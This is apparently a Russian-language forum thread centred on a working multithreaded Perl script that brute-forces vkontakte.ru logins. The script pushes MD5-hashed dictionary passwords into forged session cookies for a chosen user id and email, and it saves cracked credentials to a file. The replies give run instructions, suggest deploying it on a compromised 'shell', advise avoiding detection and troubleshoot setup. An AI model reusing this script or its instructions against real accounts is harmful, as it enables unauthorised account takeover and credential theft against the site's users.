Code: #!/usr/bin/perl use IO::Socket; use MD5; use threads; use threads::shared; my @pass : shared; ###################################### # C!klodoL # vkontakte.ru bruteforce with multi-threads ###################################### $dic = 'passl.txt'; #словарь паролей $id = 111111; #id цели $mail = 'mail%40mail.com'; #мыло, вместо @ вписать %40 $threads = 4; #количество потоков ###################################### open (pass, "<$dic"); Next: @pass = pass(); for(0..$threads) {$trl[$_] = threads->create(\&Brut, $_);} for(@trl) { $_->join; } sub Brut { while (@pass){ $pass = shift @pass; $md5 = MD5->hexhash($pass); $sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPort=>80); print $sock "HEAD http://vkontakte.ru/ HTTP/1.0\r\n". "Host: vkontakte.ru\r\n". "Accept: */*\r\n". "Content-Type: application/x-www-form-urlencoded\r\n". "User-Agent: Mozillo\r\n". "Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n". "Connection: close\r\n\r\n"; $answ = <$sock>; close $sock; print "$pass $answ"; if ($answ =~ /302/){ open (good, '>>good.txt'); print good "$id:$pass:$md5\n"; print "$id:$pass:$md5\n"; close good; exit;} } } goto Next; sub pass { my (@mas); while (<pass>){ push @mas, $_; last if (@mas == 400); } chomp @mas; return @mas; }
Установи Active Perl если для окошек (ну или серв какой нить если оч хоцца), сохрани текс кода в файл Brut.pl, и запусти, отредактировав входные данные (мыло/йд/файлспассами), как вариант залей на шелл..
С активперла с проксями может не сработать вроде... О_о Если я ошиблась, поправьте) Именно этот плоит не юзала, каюсь)
Просто ради теста прогоняю со своей тачки без проксей: один пароль сдался через 2 минуты, другой минут 20 брутился, пока в ответку Outpost не сообщил: 06.02.2008 23:37:58 Сканирование портов 195.190.105.235 TCP (4084, 4082, 4083, 4080, 4074, 4075) 06.02.2008 23:37:58 Rst атака 195.190.105.235 -> 195.190.105.235 195.190.105.235 = vkontakte.ru )) Вот так вот, vkontakte.ru практикует DOS-атаки своих пользователей? А вдруг я свой забытый пароль перебираю? Беспредельщики! Короче смотрите на палитесь, а то еще забанят.
почему же он мой пароль не распознает?)я на себе тестю,а он пробегает мой пароль,пишет ок и все)где этот гуд.ТиксТ появляется?в папке с самим файликом как я понимаю должен,но его нет кстати скрипт русские буквы,запятые распознает?может причина в этом?
Grini Исходник почитай хотя бы, прежде чем запускать. Мыло на вконтакте.ру используется в качестве логина. Скрипт посылает серверу запрос подсовывая левые куки : [ид, мыло, мд5(пароля)]. Когда сервер даёт добро, скрипт завершает работу и пишет отчет в good.txt Видимо ты даешь неправильные данные (ид, мыло или пароль)